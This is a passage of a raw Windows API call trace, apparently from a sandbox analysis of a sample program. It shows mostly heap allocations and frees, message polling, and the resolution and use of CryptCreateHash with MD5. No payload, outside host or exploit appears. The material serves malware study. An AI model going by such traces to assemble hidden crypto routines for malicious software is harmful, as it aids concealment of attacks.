hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.754] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0233.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0233.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.756] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0233.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0233.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.798] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.799] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.799] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0233.799] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0233.799] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0233.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.799] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.800] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.800] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.800] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0233.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.801] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0233.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0233.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0233.801] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0233.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.801] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0233.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0233.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0233.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0233.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0233.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, 